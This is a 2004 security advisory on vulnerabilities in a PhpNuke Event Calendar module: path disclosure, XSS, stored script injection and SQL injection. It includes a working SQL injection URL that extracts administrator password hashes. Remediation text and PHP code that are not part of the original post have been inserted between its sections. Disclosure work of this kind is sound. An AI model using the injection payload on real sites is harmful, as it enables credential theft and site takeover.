[Full-Disclosure] [waraxe-2004-SA#038 - Multiple vulnerabilities in Event Calendar module for PhpNuke]

From: Janek Vind (come2waraxe_at_yahoo.com)
Date: 11/16/04

    To: full-disclosure@lists.netsys.com
    Date: Tue, 16 Nov 2004 13:18:17 -0800 (PST)
    
    

    {================================================================================}
    { [waraxe-2004-SA#038]                                                           }
    {================================================================================}
    {                                                                                }
    { [ Multiple vulnerabilities in Event Calendar module for PhpNuke ]              }
    {                                                                                }
    {================================================================================}

    Author: Janek Vind "waraxe"
    Date: 17. November 2004
    Location: Estonia, Tartu
    Web: http://www.waraxe.us/index.php?modname=sa&id=38

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Module's Name: Event Calendar
    Module's Version: 2.13 - March 16th, 2004
    Module's Description: Provides an event calendar for
    PHP-Nuke communities.
    License: GNU/GPL
    Author's Name: Original author - Rob Sutton.
    Development continued by Holbrookau.
    Author's Email: phpnuke@holbrookau.net

    Event Calendar - a module for PHP-Nuke.
    Based on version 1.5 by Rob Sutton, the Event Calendar found here is much
    updated and features many improvements and add-ons. For example, the
    administration area features configuration via a graphical interface,
    posting of events can be moderated and users even have the option of
    adding comments to any event.

    Homepage: http://phpnuke.holbrookau.net/

    Vulnerabilities:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    This piece of software has many security-related flaws due to poor
    handling of user-submitted data.

    A - Full Path Disclosure
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    A1 - full path disclosure in "config.php":

    http://localhost/nuke73/modules/Calendar/config.php

    Warning: main(modules/Calendar/configset.php): failed
    to open stream: No such file or directory in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 11
    Warning: main(): Failed opening
    'modules/Calendar/configset.php' for inclusion
    (include_path='.;c:\php4\pear') in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 11
    Warning: main(mainfile.php): failed to open stream: No
    such file or directory in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 14
    Warning: main(): Failed opening 'mainfile.php' for
    inclusion (include_path='.;c:\php4\pear') in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 14
    Warning: main(modules//language/lang-english.php):
    failed to open stream: No such file or directory in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 19
    Warning: main(): Failed opening
    'modules//language/lang-english.php' for inclusion
    (include_path='.;c:\php4\pear') in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 19

    A2, A3 - full path disclosure in "index.php" and
    "submit.php":

    http://localhost/nuke73/modules/Calendar/index.php
    http://localhost/nuke73/modules/Calendar/submit.php
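The warnings above appear because the module files can be requested directly, so their include() calls run outside of modules.php and fail, printing the absolute install path. The following is an added example, not the Event Calendar module's own code, of the two mitigations a maintainer would apply: the standard PHP-Nuke "modules.php" guard at the top of each module file, and keeping PHP error output off the page. The file names checked in the loop are illustrative.

```php
<?php
// Added example (not the module's own code): guard a PHP-Nuke module file
// against direct requests such as /modules/Calendar/config.php, so the
// include() lines that emit "failed to open stream ... in D:\..." never run.
// The modules.php check is the usual PHP-Nuke idiom for this.

if (!isset($_SERVER['PHP_SELF']) || strpos($_SERVER['PHP_SELF'], 'modules.php') === false) {
    // Stop before any include(); nothing about the install path is printed.
    header('HTTP/1.0 403 Forbidden');
    die('You cannot access this file directly.');
}

// Even when an include does fail, do not echo the warning (and with it the
// absolute path) to the client. Log it server-side instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Fail closed on a missing include rather than continuing with warnings.
// The paths are illustrative; a real module resolves them from its config.
$needed = array(dirname(__FILE__) . '/configset.php',
                dirname(__FILE__) . '/../../mainfile.php');
foreach ($needed as $path) {
    if (!is_file($path)) {
        error_log('Calendar module: required file missing: ' . basename($path));
        die('Calendar module is not configured.');
    }
}
```

The same guard belongs at the top of index.php and submit.php (A2, A3); display_errors can equally be set in php.ini or a .htaccess php_flag line, which covers every file at once.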

    B - XSS aka cross site scripting:

    Examples:

    http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss code here]
    http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss code here]
    http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss code here]
    http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss code here]
    http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss code here]

    C - script injection in calendar event comments:

    It's a serious bug - anyone can insert JavaScript exploit code into event
    comments, and if a user or admin reads it, the JavaScript will trigger and
    bad things can happen - like cookie theft, arbitrary admin operations, etc.
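Both B and C have the same root cause: request data is echoed into HTML as-is. Here is an added example, not code from the module, of how the submit preview (B) and the event comments (C) would be handled safely. Function names, the allowed type values, and the comment length cap are assumptions; the date bounds are simply the valid ranges for day, month and year.

```php
<?php
// Added example, not the Event Calendar module's own code. Two mitigations:
// every request value echoed back into the preview page is validated and
// HTML-encoded, and stored event comments are reduced to plain text before
// they are saved and encoded again when displayed.

function cal_esc($value) {
    // Encode <, >, &, " and ' so a value containing markup renders as text.
    return htmlspecialchars((string)$value, ENT_QUOTES, 'UTF-8');
}

function cal_int($value, $min, $max, $default) {
    // Date fields are numbers; anything else is replaced by a safe default,
    // so there is no attacker-controlled string to encode in the first place.
    $n = (int)$value;
    return ($n >= $min && $n <= $max) ? $n : $default;
}

function cal_clean_comment($text) {
    // Stored comments: strip all markup and cap the length before saving.
    $text = strip_tags((string)$text);
    return substr(trim($text), 0, 2000);   // 2000 is an assumed limit
}

// --- Preview form (section B): validate, then encode on output ---
$day   = cal_int(isset($_GET['day'])   ? $_GET['day']   : 0, 1, 31, 1);
$month = cal_int(isset($_GET['month']) ? $_GET['month'] : 0, 1, 12, 1);
$year  = cal_int(isset($_GET['year'])  ? $_GET['year']  : 0, 1970, 2100, 2004);
$allowed_types = array('public', 'private');   // assumed set of type values
$type = (isset($_GET['type']) && in_array($_GET['type'], $allowed_types, true))
      ? $_GET['type'] : 'public';

echo '<p>Preview for ' . cal_esc("$year-$month-$day")
   . ' (' . cal_esc($type) . ')</p>';

// --- Event comments (section C): sanitise before store, encode on display ---
$submitted = isset($_POST['comment']) ? $_POST['comment'] : '';
$stored    = cal_clean_comment($submitted);   // value written to the database
echo '<div class="comment">' . nl2br(cal_esc($stored)) . '</div>';
```

Encoding on output is the part that matters for C: even if an older, unsanitised comment is already in the database, cal_esc() on display keeps it from executing.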

    D - critical sql injection bugs in code:

    If we take a deep look at the source code, multiple SQL queries can be
    found where some variables, mostly "$eid" and "$cid", ARE NOT surrounded
    with single quotes. Therefore SQL injection is possible. Further
    exploitation will depend on the database software and version. In the
    case of MySQL version 4.x with UNION functionality enabled, arbitrary data
    can be retrieved from the database, including the admin(s) authentication
    credentials. As is tradition, there is a proof of concept:

    ----------------[ real life exploit ]---------------

    http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1

    ----------------[/real life exploit ]---------------
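The PoC works only because "$eid" reaches the query as raw text. The following is an added example, not the module's own code, showing the vulnerable shape next to two hardened forms: enforcing the integer type before interpolation, and a prepared statement. The nuke_events table and its columns are assumptions (nuke_authors is PHP-Nuke's own table); $db stands for PHP-Nuke's global database handle and PDO is assumed for the second fix.

```php
<?php
// Added example, not the Event Calendar module's own code. Section D: an
// integer id taken from the URL and interpolated into SQL without quotes,
// beside two fixes. Table/column names other than nuke_authors are assumed.

// --- Vulnerable pattern (shown only to mark the defect; do not use) ---
// $eid = $_GET['eid'];
// $result = $db->sql_query("SELECT * FROM nuke_events WHERE eid=$eid");
// Whatever follows eid= becomes part of the SQL statement.

// --- Fix 1: enforce the type. An event id is a positive integer, nothing else. ---
function cal_event_id($raw) {
    if (!preg_match('/^[1-9][0-9]{0,9}$/', (string)$raw)) {
        return 0;   // 0 is never a valid id; callers treat it as "not found"
    }
    return (int)$raw;
}

$eid = cal_event_id(isset($_GET['eid']) ? $_GET['eid'] : '');
if ($eid === 0) {
    header('HTTP/1.0 400 Bad Request');
    die('Invalid event id.');
}
// With $eid guaranteed numeric, interpolation can no longer alter the query.
$result = $db->sql_query("SELECT * FROM nuke_events WHERE eid=$eid");

// --- Fix 2 (preferred where the DB layer supports it): a prepared statement, ---
// --- so the value never becomes part of the SQL text at all. PDO assumed.   ---
function cal_load_event(PDO $pdo, $raw_eid) {
    $eid = cal_event_id($raw_eid);
    if ($eid === 0) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT eid, cid, title FROM nuke_events WHERE eid = :eid');
    $stmt->bindValue(':eid', $eid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

The same treatment applies to "$cid" and every other id the module reads from the request; quoting the value alone is weaker than both fixes, since it still relies on escaping being applied correctly everywhere.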

    How to fix:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Vendor contacted: 06. September 2004
    Vendor responded: 06. September 2004
    Detailed list of problems sent to vendor: 08. September 2004

    Since then there has been no further response from the software developer,
    and the downloadable version is still unpatched.

    For help with patching look @ here -
    http://www.waraxe.us/forums.html

    Additional resources:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Free proxy lists -
    http://www.waraxe.us/forum/viewforum.php?f=21
    Base64 online tool -
    http://base64-encoder-online.waraxe.us/base64/base64-encoder.php

    Greetings:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to Raido Kerna, icenix, g0df4th3r and
    slimjim100!
    Tervitused - Heintz ja Maku!

    Contact:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        come2waraxe@yahoo.com
        Janek Vind "waraxe"

        Homepage: http://www.waraxe.us/

    ---------------------------------- [ EOF ] ------------------------------------


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
